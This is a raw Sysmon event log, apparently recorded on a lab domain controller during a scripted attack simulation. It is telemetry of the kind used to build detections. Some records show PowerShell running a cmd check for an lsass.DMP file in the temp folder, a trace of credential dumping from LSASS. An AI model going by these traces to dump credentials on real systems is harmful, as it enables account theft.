21:10:04.967{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025160Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.967{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A32C-60D3-3E06-00000000CF01}332C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025159Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.967{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32C-60D3-3E06-00000000CF01}332C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025158Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.981{4DB9351A-A32C-60D3-3E06-00000000CF01}332C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "py -3 --version >nul 2>&1 && exit /b %%errorlevel%%" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000025157Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.936{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F9633CAEFABE88A261E9EA445931DE9,SHA256=5A8E40D320C630CA1A2D076FF4ADAFE3A751DD259D529A31594A888F6079AFBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025156Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.920{4DB9351A-A32C-60D3-3C06-00000000CF01}5544ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025155Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.920{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B253A3865832081BE03BD70D2C3EF999,SHA256=B94C2528C86ABD64A606C75030CF9BB7B074876CA26D560A4FFD3305CFE53FEA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025154Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.889{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32C-60D3-3D06-00000000CF01}5292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025153Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.889{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025152Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.889{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025151Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.889{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025150Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.889{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025149Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.889{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A32C-60D3-3D06-00000000CF01}5292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025148Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.889{4DB9351A-A32C-60D3-3C06-00000000CF01}55447024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32C-60D3-3D06-00000000CF01}5292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9ca36d54(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beabb9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64) 154100x800000000000000025147Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.891{4DB9351A-A32C-60D3-3D06-00000000CF01}5292C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "if not exist %%tmp%%\lsass.DMP (exit /b 1)"C:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A32C-60D3-3C06-00000000CF01}5544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {cmd /c \""if not exist %tmp%\lsass.DMP (exit /b 1)\""} 10341000x800000000000000025146Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.873{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A32C-60D3-3C06-00000000CF01}5544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025145Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.873{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A32C-60D3-3C06-00000000CF01}5544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025144Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.827{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A32C-60D3-3C06-00000000CF01}5544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025143Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.827{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A32C-60D3-3C06-00000000CF01}5544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000025142Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:10:04.795{4DB9351A-A32C-60D3-3C06-00000000CF01}5544\PSHost.132689562047173539.5544.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025141Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.780{4DB9351A-A32C-60D3-3C06-00000000CF01}5544ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0vplgbkj.fya.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025140Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.780{4DB9351A-A32C-60D3-3C06-00000000CF01}5544ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_05ypjy2p.fst.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025139Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.764{4DB9351A-A32C-60D3-3C06-00000000CF01}5544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_05ypjy2p.fst.ps12021-06-23 21:10:04.764 10341000x800000000000000025138Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.748{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A32C-60D3-3C06-00000000CF01}5544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025137Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.717{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32C-60D3-3C06-00000000CF01}5544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025136Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.717{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32C-60D3-3C06-00000000CF01}5544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025135Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.717{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025134Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 